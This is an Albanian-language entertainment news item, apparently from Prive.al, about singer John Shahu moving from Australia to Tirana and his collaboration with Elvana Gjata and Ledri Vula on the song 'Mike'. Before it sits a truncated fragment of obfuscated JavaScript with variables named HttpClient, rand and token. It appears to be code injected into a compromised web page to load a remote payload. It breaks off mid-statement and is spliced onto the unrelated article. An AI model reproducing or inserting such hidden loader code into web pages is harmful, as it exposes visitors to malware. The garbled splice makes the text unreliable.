;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

John Shahu – Nga Australia, në Tiranë për muzikën

By

Pas pothuajse një viti nga suksesi i këngës “Mike” e kënduar nga John Shahu, Elvana Gjata dhe Ledri Vula, artisti shqiptar nga Australia, ka vendosur të jetojë në Shqipëri për projekte të shumta muzikore.

Në një intervistë për Top Channel, Johni ka rrëfyer se si erdhi deri tek bashkëpunimi me Elvanën dhe Ledrin.

“E kisha bërë një melodi ka dy tre vjet më parë. Ja u tregova atyre, e pëlqyen shumë. Ja cuan Elvanës. E pëlqeu ajo, u bë bashkëpunimi pastaj”, tha ai.

Ndër të tjerash, Johni tregoi se ka shtatë muaj që jeton në Tiranë duke treguar se i pëlqen jetesa atje dhe se është shumë ndryshe nga Australia.

Artisti foli edhe për planet në të ardhmen duke thënë se ka disa projekte të reja përfshirë bashkëpunime./Prive.al

Artikuj të ngjashëm